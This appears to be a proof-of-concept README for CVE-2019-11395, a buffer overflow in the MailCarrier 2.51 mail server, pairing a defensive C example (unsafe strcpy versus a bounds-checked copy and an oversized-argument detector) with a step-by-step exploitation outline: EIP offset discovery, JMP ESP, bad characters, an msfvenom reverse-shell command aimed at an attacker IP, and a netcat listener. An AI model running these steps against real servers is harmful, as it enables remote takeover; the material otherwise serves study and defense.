
CVE-2019-11395 PoC: Taps Lab MailCarrier buffer error vulnerability

Related vulnerability
Title: Taps Lab MailCarrier buffer error vulnerability (CVE-2019-11395)
Description: Taps Lab MailCarrier is a mail server from the Korean company Taps Lab, built for the Windows Server platform. The product supports SMTP, POP3, IMAP and other protocols. Taps Lab MailCarrier 2.51 contains a buffer overflow vulnerability. The flaw stems from the product failing to validate data boundaries correctly when operating on memory, so that reads or writes are performed at other, associated memory locations. An attacker can exploit this to cause a buffer overflow or heap overflow.
Description
Proof of concept with the academic purpose of understanding the buffer overflow vulnerability, using CVE-2019-11395 as background.
Introduction
# CVE-2019-11395

## Overview

This Proof of Concept (PoC) demonstrates a **Buffer Overflow vulnerability** in MailCarrier 2.51, allowing remote attackers to execute arbitrary code via a long string. The vulnerability can be exploited using the following processes:

- `SMTP RCPT TO`
- `POP3 USER`
- `POP3 LIST`
- `POP3 TOP`
- `POP3 RETR`

The project aims to provide an **academic approach** to understanding how Buffer Overflow works.
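As an added illustration (not code from this PoC repository or from MailCarrier itself), the C program below shows the defect class behind this CVE beside its fix: an unbounded copy of a protocol argument into a fixed stack buffer, and a handler that checks the argument length before copying and rejects oversized input. The same check doubles as a detection rule over captured SMTP/POP3 lines for the five verbs listed above. The 256-byte cap is the RFC 5321 forward-path maximum and is applied to the POP3 verbs here by assumption; the sample lines and the 1500-byte `USER` line are constructed for the example.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* 256 octets is the RFC 5321 forward-path limit; reusing it for the POP3 verbs
 * is an assumption made for this example. */
#define MAX_ARG_LEN 256

enum verdict { CMD_OK = 0, CMD_OVERSIZED = 1, CMD_NOT_TARGETED = 2 };

/* Verbs named in the advisory. "RCPT TO" is two tokens, so verbs are matched as prefixes. */
static const char *const targeted_verbs[] = { "RCPT TO", "USER", "LIST", "TOP", "RETR" };

/* Defect pattern behind CVE-2019-11395 (shown for contrast; not used by the checks below):
 * an unbounded copy into a fixed stack buffer, so an argument longer than buf
 * overwrites the saved return address and ends up in EIP. */
void store_argument_unsafe(const char *arg) {
    char buf[128];
    strcpy(buf, arg);  /* no bounds check */
    printf("stored %zu bytes\n", strlen(buf));
}

/* Hardened counterpart: the length is checked against the buffer before any copy. */
static bool store_argument_safe(const char *arg, size_t alen, char *out, size_t outsz) {
    if (alen >= outsz)
        return false;          /* refuse instead of overflowing */
    memcpy(out, arg, alen);
    out[alen] = '\0';
    return true;
}

/* Case-insensitive prefix test (SMTP/POP3 verbs are case-insensitive). */
static bool ci_prefix(const char *s, const char *prefix) {
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return false;
    return true;
}

/* Classify one protocol line: usable as a server-side input check and as a
 * detection rule over captured traffic. */
enum verdict classify_command(const char *line) {
    size_t nverbs = sizeof targeted_verbs / sizeof targeted_verbs[0];
    for (size_t i = 0; i < nverbs; i++) {
        size_t vlen = strlen(targeted_verbs[i]);
        if (!ci_prefix(line, targeted_verbs[i]))
            continue;
        char next = line[vlen];   /* the verb must end here, not be part of a longer word */
        if (next != '\0' && next != ' ' && next != ':' && next != '\r' && next != '\n')
            continue;
        const char *arg = line + vlen;
        while (*arg == ' ' || *arg == ':')
            arg++;
        size_t alen = strcspn(arg, "\r\n");   /* the argument runs up to CRLF */
        char stored[MAX_ARG_LEN + 1];
        if (!store_argument_safe(arg, alen, stored, sizeof stored))
            return CMD_OVERSIZED;
        return CMD_OK;
    }
    return CMD_NOT_TARGETED;
}

/* Constructed sample: a USER command carrying a 1500-byte username. */
const char *make_long_user_line(void) {
    static char line[1600];
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', 1500);
    memcpy(line + 5 + 1500, "\r\n", 3);
    return line;
}

/* Constructed sample traffic: a benign line per targeted verb plus one untargeted verb. */
static const char *const sample_lines[] = {
    "RCPT TO:<alice@example.test>\r\n",
    "user bob\r\n",
    "LIST\r\n",
    "TOP 1 10\r\n",
    "RETR 1\r\n",
    "NOOP\r\n",
};

/* Run the rule over the samples plus the long line; return how many are oversized. */
size_t scan_sample_lines(void) {
    size_t oversized = 0;
    size_t n = sizeof sample_lines / sizeof sample_lines[0];
    for (size_t i = 0; i < n; i++)
        if (classify_command(sample_lines[i]) == CMD_OVERSIZED)
            oversized++;
    if (classify_command(make_long_user_line()) == CMD_OVERSIZED)
        oversized++;
    return oversized;
}

int main(void) {
    printf("oversized lines in sample traffic: %zu\n", scan_sample_lines());  /* prints 1 */
    return 0;
}
```

The verb test requires the verb to be followed by a separator, so `USERNAME` is not mistaken for `USER`; the length check sits in the copy routine rather than in the parser so that every caller gets it, which is the property the vulnerable handler lacks.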

---

## ⚠️ Warnings

Before running any tests, **never use your production environment** for initial experimentation. Instead, create a **lab setup** similar to your production environment to **avoid any issues or unintended consequences**.

---

## 🔧 Preparation

### 1. Discover the Vulnerability
- Use the **fuzzing technique** to determine the approximate number of bytes required to break the application.

### 2. Find the Offset
- Once the crash occurs, use:
  ```bash
  msf-pattern_create -l <number_of_bytes>
  ```
  This helps determine the offset, the exact number of bytes needed to overwrite `EIP`.
- Use the following command to confirm the offset:
  ```bash
  msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
  ```
  This identifies the exact byte count required to control `EIP`.

### 3. Find a JMP or CALL Instruction
- Locate an instruction such as:
  ```asm
  JMP ESP
  CALL ESP
  ```
  We will use this address to redirect execution. Be cautious with ASLR, SafeSEH, or other protection mechanisms.

### 4. Identify bad chars
- Use the Mona tool within Immunity Debugger to check for bad characters.

### 5. Generate Shellcode
- Create shellcode while excluding bad characters:
  ```bash
  msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" EXITFUNC=thread -f python
  ```

### 6. Add NOPs
- Insert `NOP` (`\x90`) instructions into the payload to improve stability.

### 7. Establish a connection
- Use `netcat` (`nc`) to create a reverse shell and connect to the target.